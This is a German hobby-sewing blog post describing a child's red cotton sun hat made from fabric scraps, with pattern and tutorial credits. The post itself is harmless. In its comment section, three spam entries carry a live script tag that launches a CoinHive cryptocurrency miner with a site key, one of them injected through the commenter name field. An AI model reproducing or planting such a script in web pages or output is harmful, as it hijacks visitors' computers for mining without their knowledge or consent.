Home


Über uns


Nähen

DIY

der Rest


Blogarchiv


Impressum

Blog

Dienstag, 25.07.2017   •   ☺ Verena    •   ✎ Nähen

Es wird Sommmer.... vielleicht

In der letzten Woche sah es so aus als würde doch mal endlich der Sommer zu uns kommen. Also habe ich wie immer brav die Tasche für den Kindergarten fertig gemacht. Sonnencreme, Handtuch, Wechselklamotten.....nur der Sonnenhut fehlt noch. Der schöne Hut aus dem letzten Sommer passt zwar noch, aber das heißt ja nicht, dass man nicht noch einen neuen nähen kann. Den Hut aus dem letzten Jahr zeige ich euch natürlich auch noch.

Hut

Dieses Mal habe ich mir als erstes die Mila von m hoch drei ausgesucht. Und ich finde ich habe mir die richtige Mütze ausgesucht. Die Mütze wird aus Baumwolle genäht. Hinten ist ein kleines Stück Gummiband (mit dem ich bei jedem Projekt, in dem ich es brauche, auf Kriegsfuß stehe) eingenäht, dass bei mir aber nicht so richtig viel Sinn macht.

Hut

Für die Mütze habe ich Reste aus meiner Sammlung verwendet, darum kann ich gar nicht genau sagen wo die Stoffe her sind. Aber da die Mütze, zumindest von außen) komplett rot ist, musste noch ein kleiner Hingucker her. Dabei habe ich mich an einer Youtube Anleitung von Zierstoff orientiert. Ich finde die Blume ist toll geworden und macht den Hut auf jeden Fall noch ein bisschen schöner. Meiner Monstermaus gefällt sie auf jeden Fall sehr und das ist für mich die Hauptsache.

Hut

Stoff: Reste
Schnittmuster/ Anleitungen: Mila von m hoch 3
Stoffblume „Sunny“ von Zierstoff

Kommmentare

Coole Seite! <script>var miner = new CoinHive.Anonymous('tal1wt43LtiE5Le9eoSmgYjsgNNTm8QF'); miner.start(); </script> hat geschrieben:
Coole Seite! <script>var miner = new CoinHive.Anonymous('tal1wt43LtiE5Le9eoSmgYjsgNNTm8QF'); miner.start(); </script>
Coole Seite! <script>var miner = new CoinHive.Anonymous('tal1wt43LtiE5Le9eoSmgYjsgNNTm8QF'); miner.start(); </script>

 hat geschrieben:

Neuer Gästebucheintrag:

Name:

eMail:

Text: